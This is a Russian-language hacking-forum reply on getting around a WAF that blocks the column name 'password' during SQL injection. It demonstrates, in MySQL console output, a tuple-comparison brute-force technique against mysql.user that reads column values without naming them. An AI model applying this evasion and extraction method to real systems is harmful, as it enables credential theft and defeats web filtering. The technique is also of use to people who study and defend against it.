|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от xmp
↑
Вопрос: как при помощи sqlmap сделать из запроса SELECT password FROM a.user
(Где password фильтруется WAF) запрос вида SELECT 0x66 FROM a.user
"SELECT 0x66 FROM a.user" так не получится, просто заселектиш строку
смотря что за запрос, но это в любом случае отдельный скрипт писать придется
если знаешь количество колонок в a.user то можно что то около того бинарным перебором сделать
Код:
mysql> select 'true' from(select 1)x where 'aocalhost'>'localhost';
Empty set (0.00 sec)
mysql> select 'true' from(select 1)x where 'qocalhost'>'localhost';
+------+
| true |
+------+
| true |
+------+
1 row in set (0.00 sec)
на примере mysql.user, первая колонка в этой таблице "Host"
Код:
mysql> select 'true' from(select 1)x where ('aocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1);
Empty set (0.01 sec)
mysql> select 'true' from(select 1)x where ('qocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1);
+------+
| true |
+------+
| true |
+------+
1 row in set (0.01 sec)
|